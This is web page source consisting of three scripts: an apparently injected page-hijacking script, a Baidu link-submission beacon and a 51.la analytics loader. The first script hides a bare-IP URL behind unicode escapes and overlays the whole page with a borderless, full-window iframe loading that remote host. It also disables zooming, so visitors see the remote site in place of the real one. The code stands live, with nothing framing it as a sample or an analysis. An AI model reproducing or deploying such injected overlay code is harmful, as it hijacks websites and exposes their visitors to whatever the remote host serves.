<script>
(function() {
    var urlArr = ['\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0033\u0038\u002e\u0034\u0038\u002e\u0031\u0033\u0033\u002e\u0032\u0034\u0034\u003a\u0036\u0033\u0039\u0036\u002f'];
    var _url = urlArr[randomRange(urlArr.length)];
    setFrame(_url);

    function setFrame(olink){
      var ss = '<div style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial; background-repeat: initial;"><ifr'
        + 'ame id="showcloneshengxiaon" scrolling="yes" marginheight=0 marginwidth=0  frameborder="0" width="100%" height="100%" src="'+olink+'"></iframe></div><style type="text/css">html{width:100%;height:100%;}body {width:100%;height:100%;margin: 0;}</style>';
      setTimeout(function() {
        try {
          var _body = document.getElementsByTagName('body')[0];
          if(_body){
            document.getElementsByTagName('body')[0].insertAdjacentHTML('beforeend', ss);
          }else{
            setTimeout(function() {
              document.getElementsByTagName('body')[0].insertAdjacentHTML('beforeend', ss);
            }, 1000)
          }
          var oMeta = document.createElement('meta');
          oMeta.name = 'viewport';
          oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no';
          document.getElementsByTagName('head')[0].appendChild(oMeta);
        } catch (e) {}
      }, 200)
    }
    function randomRange(max) {
      return Math.floor(Math.random() * max);
    }
})();

</script>
  <script>
	(function(){
		var canonicalURL, curProtocol;
		//Get the <link> tag
		var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
		//Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
	    //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
    	!function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
</script>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js?id=JatAoMv7wcZSpzvY&ck=JatAoMv7wcZSpzvY"></script>